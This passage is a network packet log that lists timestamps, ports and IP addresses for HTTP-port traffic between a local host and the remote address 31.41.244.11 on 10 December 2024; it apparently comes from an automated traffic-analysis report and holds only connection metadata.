Dec 10, 2024 11:11:10.724817038 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.724862099 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.724895000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.724939108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.725899935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.725944042 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.725991964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.726031065 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.726993084 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.727035999 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.727154016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.727197886 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.728120089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.728163004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.728179932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.728224039 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.729207993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.729274035 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.729321957 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.729366064 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.730353117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.730401039 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.730431080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.730475903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.731518030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.731539011 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.731561899 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.731574059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.732667923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.732712984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.732839108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.732882977 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.733740091 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.733786106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.733843088 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.733886003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.734980106 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.735030890 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.735084057 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.735126972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.735959053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.735975981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.735997915 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.736021996 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.736982107 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.737027884 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.737090111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.737134933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.738034010 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.738080025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.738136053 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.738176107 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.739183903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.739223957 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.739324093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.739367008 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.740255117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.740298033 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.740422010 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.740468025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.741339922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.741401911 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.741434097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.741477013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.742435932 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.742476940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.742553949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.742600918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.743557930 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.743604898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.743653059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.743696928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.744652987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.744697094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.744761944 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.744808912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.745776892 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.745821953 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.745903969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.745949030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.746864080 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.746908903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.746953011 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.746997118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.747961998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.748008013 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.748080015 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.748126030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.749089956 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.749134064 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.749188900 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.749233007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.750188112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.750236034 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.750349045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.750394106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.751270056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.751321077 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.751375914 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.751421928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.752368927 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.752413988 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.752494097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.752535105 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.753470898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.753515005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.753576040 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.753632069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.754724026 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.754770994 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.754797935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.754841089 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.755680084 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.755732059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.755796909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.755840063 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.756797075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.756843090 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.756916046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.756959915 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.757961035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.758008003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.758086920 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.758131027 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.759001017 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.759047985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.759113073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.759155989 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.760134935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.760201931 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.760230064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.760277987 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.761204958 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.761251926 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.761300087 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.761343956 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.762301922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.762347937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.762403965 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.762444019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.763417959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.763463974 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.763521910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.763567924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.764508009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.764550924 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.764616013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.764661074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.765639067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.765682936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.765742064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.765786886 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.766727924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.766774893 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.766840935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.766885042 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.767827034 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.767872095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.767904043 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.767951012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.768932104 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.768979073 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.769036055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.769077063 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.770049095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.770090103 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.770123959 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.770163059 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.771159887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.771207094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.771280050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.771330118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.772247076 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.772295952 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.772325039 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.772367001 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.773416042 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.773473024 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.773555994 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.773595095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.774534941 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.774575949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.774632931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.774674892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.775661945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.775716066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.775840044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.775878906 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.776951075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.776998997 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.910053968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.910114050 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.910172939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.910207033 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.910535097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.910586119 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.910617113 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.910655975 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.911665916 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.911717892 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.911851883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.911892891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.912770987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.912817001 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.912842035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.912890911 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.913826942 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.913872957 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.913922071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.913966894 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.914921045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.914968967 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.915003061 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.915043116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.916065931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.916120052 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.916140079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.916182995 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.917144060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.917188883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.917368889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.917407990 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.918251991 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.918303967 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.918557882 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.918607950 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.919395924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.919449091 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.919555902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.919600964 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.920553923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.920605898 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.920674086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.920716047 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.921647072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.921713114 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.921744108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.921794891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.922620058 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.922676086 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.922761917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.922810078 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.923741102 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.923798084 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.923829079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.923897982 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.924890041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.924904108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.924945116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.924967051 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.925940037 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.925997019 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.926060915 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.926109076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.927077055 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.927133083 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.927155972 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.927196026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.928145885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.928194046 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.928252935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.928293943 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.929384947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.929435968 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.929534912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.929579020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.930556059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.930599928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.930624962 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.930665970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.931632042 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.931680918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.931765079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.931806087 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.933021069 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.933065891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.933124065 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.933165073 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.934125900 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.934178114 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.934200048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.934242010 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.934926987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.934984922 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.935005903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.935045004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.935967922 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.936014891 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.936043978 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.936085939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.937014103 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.937067032 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.937119961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.937158108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.938152075 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.938194036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.938261986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.938379049 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.939265966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.939327002 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.939364910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.939413071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.940299988 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.940346003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.940376997 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.940418005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.941412926 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.941473007 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.941497087 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.941534996 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.942591906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.942641020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.942677021 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.942712069 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.943640947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.943681955 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.943767071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.943806887 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.944763899 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.944809914 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.944948912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.945024014 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.945837021 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.945878029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.945961952 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.946002960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.946954966 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.946995020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.947062016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.947101116 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.948008060 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.948051929 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.948132992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.948172092 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.949168921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.949210882 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.949311018 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.949357986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.950237036 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.950285912 CET	49828	80	192.168.2.5	31.41.244.11
